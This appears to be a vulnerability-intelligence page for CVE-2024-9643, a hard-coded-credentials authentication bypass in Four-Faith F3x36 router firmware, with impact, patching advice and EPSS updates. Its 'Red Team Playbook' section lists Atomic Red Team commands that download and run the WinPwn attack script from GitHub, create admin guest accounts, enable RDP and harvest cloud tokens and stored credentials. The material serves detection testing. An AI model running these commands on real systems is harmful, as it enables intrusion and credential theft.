CVE-2024-9643
Overview
This vulnerability is an authentication bypass caused by hard-coded credentials embedded within the administrative web server of the Four-Faith F3x36 router firmware version 2.0.0. The flaw resides in the web interface's authentication mechanism, where fixed credentials are used instead of dynamic or user-configurable ones, allowing unauthorized access through crafted HTTP requests. The affected component is the router's administrative web management interface, which fails to properly validate authentication tokens or credentials.
Vulnerability Description
The Four-Faith F3x36 router using firmware v2.0.0 is vulnerable to authentication bypass due to hard-coded credentials in the administrative web server. An attacker with knowledge of the credentials can gain administrative access via crafted HTTP requests. This issue appears similar to CVE-2023-32645.
Impact
An attacker can gain full administrative access to the Four-Faith F3x36 router remotely without authentication, enabling configuration changes, network traffic interception, or device control. This requires only network access to the device's management interface and knowledge of the hard-coded credentials. The vulnerability's CVSS vector indicates it is remotely exploitable with low attack complexity and no privileges or user interaction needed (AV:N/AC:L/PR:N/UI:N). Successful exploitation can lead to complete compromise of the device and potential lateral movement within the network.
Solution
Users should upgrade the Four-Faith F3x36 router firmware to a version later than 2.0.0 where this issue is addressed, as detailed in the advisory published at https://vulncheck.com/advisories/four-faith-hard-coded-creds and Talos report TALOS-2023-1752. The vendor recommends applying the latest firmware updates that remove hard-coded credentials and implement proper authentication mechanisms. Administrators should consult these advisories for step-by-step patching instructions and verify firmware versions to ensure remediation.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Four-Faith F3x36 router, specifically in its firmware version 2.0.0, stems from the presence of hard-coded credentials within the administrative web server. This design flaw allows unauthorized users to bypass authentication mechanisms, granting them administrative access to the router's configuration and management features. The hard-coded nature of these credentials means that they are embedded in the firmware and can be easily extracted by an attacker with sufficient knowledge of the device. This vulnerability is particularly concerning as it undermines the foundational security principle of ensuring that only authorized personnel can access critical system functionalities.
Attack vectors for exploiting this vulnerability are straightforward, primarily involving crafted HTTP requests that leverage the hard-coded credentials. An attacker could utilize various tools to automate the process of sending these requests, effectively bypassing any authentication checks that would typically protect the administrative interface. This exploitation could occur remotely, allowing attackers to target devices across the internet without physical access. Furthermore, the simplicity of the attack means that even individuals with limited technical expertise could potentially exploit the vulnerability, increasing the risk of widespread compromise.
The real-world impact of this vulnerability is significant, particularly for organizations relying on the Four-Faith F3x36 router for network management. Gaining administrative access could allow an attacker to alter configurations, redirect traffic, or even deploy malware within the network. Such actions could lead to data breaches, loss of sensitive information, and disruption of services, resulting in financial losses and reputational damage. Moreover, the presence of this vulnerability could expose organizations to regulatory scrutiny, especially if they are subject to compliance standards that mandate robust security practices.
Detection of this vulnerability requires a proactive approach, including regular security audits and vulnerability assessments of network devices. Organizations should implement intrusion detection systems that can identify unusual access patterns or unauthorized attempts to access the administrative interface. Additionally, monitoring logs for any suspicious activity can provide early warning signs of exploitation attempts. To mitigate the risks associated with this vulnerability, organizations should prioritize updating the firmware of affected devices to a version that does not contain hard-coded credentials. Furthermore, employing network segmentation and limiting access to administrative interfaces through firewalls can reduce the attack surface.
In conclusion, the vulnerability in the Four-Faith F3x36 router represents a critical security risk due to its potential for exploitation through authentication bypass. The implications of such a vulnerability extend beyond technical concerns, impacting organizational integrity and trust. By understanding the technical details, potential attack vectors, and real-world consequences, organizations can better prepare themselves to detect and mitigate these risks effectively. Implementing robust security measures and maintaining awareness of vulnerabilities in deployed devices is essential for safeguarding against potential threats in an increasingly interconnected world.
CSURFACE threat intelligence has identified a significant increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-9643, rising by over 39% to a current level placing it near the 97th percentile. This upward trend, coupled with a steady 7-day increase, indicates growing confidence in the likelihood of exploitation, despite the absence of new publicly disclosed exploits or active attack campaigns detected by our telemetry. The heightened EPSS score reflects an increased risk posture, suggesting that threat actors may be prioritizing this vulnerability due to its critical severity and the straightforward nature of the authentication bypass via hard-coded credentials. For defenders, this shift underscores the urgency of monitoring for potential exploitation attempts and reassessing exposure, especially in environments where Four-Faith F3x36 routers remain in use. While no direct exploitation has been observed, the evolving risk landscape elevates the threat level, warranting increased vigilance and proactive threat detection efforts.
Update 2 — May 18, 2026
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2024-9643, with our sensors registering new instances of attempted exploitation. Although the EPSS score has experienced a slight decline, this reduction does not correspond to diminished adversary interest; rather, it reflects a short-term fluctuation amid an overall upward trend in observed reconnaissance and attack attempts. The emergence of these new sightings signals that threat actors are actively probing networks for vulnerable Four-Faith F3x36 routers, likely leveraging the known hard-coded credentials to bypass authentication controls. This development elevates the immediacy of the threat, as successful exploitation grants full administrative access, enabling attackers to manipulate device configurations or pivot within affected environments. While no novel exploit variants or ransomware group involvement have been confirmed at this stage, the increased detection frequency underscores a growing operational focus on this vulnerability. Consequently, the threat level should be considered heightened, with a greater probability of exploitation attempts targeting organizations that have not yet mitigated exposure.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Four-Faith | F3x36 Firmware | 2.0 |
cpe:2.3:o:four-faith:f3x36_firmware:2.0:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
1 eventsSighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-191 | Read Sensitive Constants Within an Executable |
34%
|
— | Low | |
| CAPEC-70 | Try Common or Default Usernames and Passwords |
30%
|
Medium | High |
Red Team Playbook
36 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-9643 |
| vulncheck.com |
GitHub CVE
third-party-advisory
|
https://vulncheck.com/advisories/four-faith-hard-coded-creds |
| talosintelligence.com |
GitHub CVE
third-party-advisory
|
https://talosintelligence.com/vulnerability_reports/TALOS-2023-1752 |